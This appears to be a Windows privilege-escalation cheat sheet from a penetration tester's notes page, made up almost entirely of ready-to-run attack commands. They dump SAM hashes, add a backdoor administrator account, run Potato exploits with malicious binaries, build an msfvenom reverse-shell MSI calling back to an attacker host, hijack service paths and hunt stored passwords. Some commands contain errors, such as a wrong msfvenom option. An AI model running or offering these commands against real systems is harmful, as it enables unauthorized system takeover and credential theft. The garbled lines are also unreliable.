Windows

Find Windows Kernel Vulnerabilities

systeminfo

wes /tmp/systeminfo.txt -c -e --definitions /opt/wesng/definitions.zip -i "Elevation Of Privilege" | egrep -i exploit-db

wes /tmp/systeminfo.txt -c -e --definitions /opt/wesng/definitions.zip -i 'Remote Code Execution' | egrep -i exploit-db

windows-exploit-suggester.py --systeminfo /tmp/systeminfo.txt -d /opt/winreconpack/2022-10-09-mssb.xls

Test For Previously Used credentials

cmdkey /list

runas /savecred /user:someuser whoami.exe

Test For abuseable privileges

whoami /priv

SeBackupPrivilege

reg.exe save hklm\sam sam.save

reg.exe save hklm\system system.save

secretsdump.py -sam sam.save -system system.save local

SeRestorePrivilege

SeRestoreAbuse.exe "cmd /c net user thescriptkid thescriptkid /add"

SeRestoreAbuse.exe "cmd /c net localgroup administrators thescriptkid /add"

secretsdump.py domain.local/user:password@$ip

SeImpersonatePrivilege OR SeAssignPrimaryToken

RoguePotato

If the machine is >= Windows 10 1809 & Windows Server 2019

socat tcp-listen:135,reuseaddr,fork tcp:Windowsip:9999

Transfer a malicious binary or nc.exe before running the following command

RoguePotato.exe -r Kali-ip -e "C:\full\path\to\malicious.exe" -l 9999

JuicyPotato

If the machine is < Windows 10 1809 < Windows Server 2019

juicypotato.exe -l 1337 -p c:\full\path\to\malicious.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} OR {4991d34b-80a1-4291-83b6-3328366b9097}

PrintSpoofer

printspoofer.exe -c "C:\full\path\to\malicious.exe" -i

HotPotato

Windows 7, 8, 10, Server 2008, and Server 2012

SeDebugPrivilege

SeShutdownPrivilege

shutdown /r /t 0

SeManageVolumePrivilege

SeTakeOwnershipPrivilege

Test For alwayselevated

Both must queryies must return 0x1

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

msfvenom -p windows/x64/shell_reverse_tcp HOST=$tun0 LPORT=53 -f msi -o thescriptkid.msi

msiexec /quiet /qn /i C:\Windows\Temp\thescriptkid.msi

Find Insecure Sam System backups

.\accesschk.exe -qlv C:\Windows\repair\Sam

.\accesschk.exe -qlv C:\Windows\repair\System

Non-default Programs Discovery

This may reveal vulnerable server software or client software to elevate privileges

cmd /c REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

dir "C:\ProgramData"

dir "C:\Program Files"

dir "C:\Program Files (x86)"

Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

Get-ChildItem "C:\Program Files (x86)" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

.\accesschk.exe -uws "Everyone" "C:\Program Files"

.\accesschk.exe -uws "Everyone" "C:\Program Files (x86)

Test For Plaintext passwords

In Unattended Files

type C:\Windows\Panther\Unattended.xml

type C:\Windows\Panther\Unattend\Unattended.xml

In Registries

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

In WinLogon

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

In SNMP Paraemeters

reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

In Sticky Notes

type C:\Users\%USERNAME%\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

Or with PowerShell

type $home\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

In Clipboard

powershell -command "Get-Clipboard"

In VNC

reg query "HKCU\Software\ORL\WinVNC3\Password"

In Putty

reg query HKEY_CURRENT_USER\Software\%username%\Putty\Sessions\ /f "Proxy" /s

Or With PowerShell

reg query HKEY_CURRENT_USER\Software\$env:username\Putty\Sessions\ /f "Proxy" /s

In Powershell History

type $home\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

In IIS WebServer configs

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

type C:\inetpub\wwwroot\web.config | findstr connectionString

In WebServer Directories

findstr /si password *.txt *.ini *.config *.php *.pl *.xml *.xls *.xlsx *.csv *.doc *.docx

Test For AutoRuns

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

accesschk.exe -qlwv C:\path\to\executeable

Unmount Disks/Drives

mountvol

Get-PSdrive

Test Services

Get-CIMInstance -Class Win32_Service | select Name,PathName,StartMode,Started,StartName,State

wmic service get name,displayname,pathname,startmode

.\accesschk.exe /accepteula -uwcqv someuser *

sc.exe qc someservice

Insecure Service Executables

.\accesschk.exe -ulvqws everyone "C:\program files"

Or

icacls C:\path\to\insecureExecutable.exe

wmic service get name,pathname | findstr insecureExecutable.exe

sc qc someservice

.\accesschk.exe -qlcv someservice

icacls malicious.exe /grant Everyone:F

sc stop/start OR shutdown /r /t 0

Unquoted Service Paths

icacls C:\path\to\this directory\executable.exe

Create file at C:\path\to\this.exe

icacls C:\path\to\this.exe /grant Everyone:F

sc stop/start OR shutdown /r /t 0

Insecure Service Permissions

.\accesschk.exe /accepteula -uwcqv someuser *

.\accesschk.exe /accepteula -qlcv someservice

icacls malicious.exe /grant Everyone:F

sc config someservice binpath="C:\path\to\malicious.exe" obj= LocalSystem

sc stop/start someservice

Weak Registry Permissions

.\accesschk.exe -ulvqkws grouporuser HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services

reg query \path\to\regservice

sc qc regservice

reg add HKLM\SYSTEM\CurrentControlSet\services\regservice /v ImagePath /t REG_EXPAND_SZ /d C:\path\to\malicious.exe /f

Test For Scheduled Tasks

Useful to have time

Get-Date

schtasks /query /fo list /v | findstr /c:"User:" /c:"Run:" /c:"TaskName:" /c:"Start Time:" /c:"Last Run Time:" /c:"Start Time:"

schtasks /query /tn \path\to\sometask /fo list /v

icacls C:\Path\to\taskExecutable

Read code if non EXE

type C:\Path\to\script

Replace / modify content for code execution

Force execution or wait for task to run

schtasks /run /tn sometask

Test For StartUp Apps

.\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

Test For Insecure GUI Apps

Search and run GUI Apps as they may be ran as a privileged user

tasklist /V

Research for ways to potentially open a cmd prompt

Find Vulnerable Driver

List All Drivers

driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object   'Display Name', 'Start Mode', Path

Get information on specific driver software based on name

Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName,  
DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}

PreviousLinux NextWindows Active Directory

Last updated 2 years ago

hashtagFind Windows Kernel Vulnerabilities

hashtagTest For Previously Used credentials

hashtagTest For abuseable privileges

hashtagSeBackupPrivilege

hashtagSeRestorePrivilege

hashtagSeImpersonatePrivilege OR SeAssignPrimaryToken

hashtagRoguePotato

hashtagJuicyPotato

hashtagPrintSpoofer

hashtagHotPotato

hashtagSeDebugPrivilege

hashtagSeShutdownPrivilege

hashtagSeManageVolumePrivilege

hashtagSeTakeOwnershipPrivilege

hashtagTest For alwayselevated

hashtagFind Insecure Sam System backups

hashtagNon-default Programs Discovery

hashtagTest For Plaintext passwords

hashtagIn Unattended Files

hashtagIn Registries

hashtagIn WinLogon

hashtagIn SNMP Paraemeters

hashtagIn Sticky Notes

hashtagOr with PowerShell

hashtagIn Clipboard

hashtagIn VNC

hashtagIn Putty

hashtagOr With PowerShell

hashtagIn Powershell History

hashtagIn IIS WebServer configs

hashtagIn WebServer Directories

hashtagTest For AutoRuns

hashtagUnmount Disks/Drives

hashtagTest Services

hashtagInsecure Service Executables

hashtagOr

hashtagUnquoted Service Paths

hashtagInsecure Service Permissions

hashtagWeak Registry Permissions

hashtagTest For Scheduled Tasks

hashtagTest For StartUp Apps

hashtagTest For Insecure GUI Apps

hashtagFind Vulnerable Driver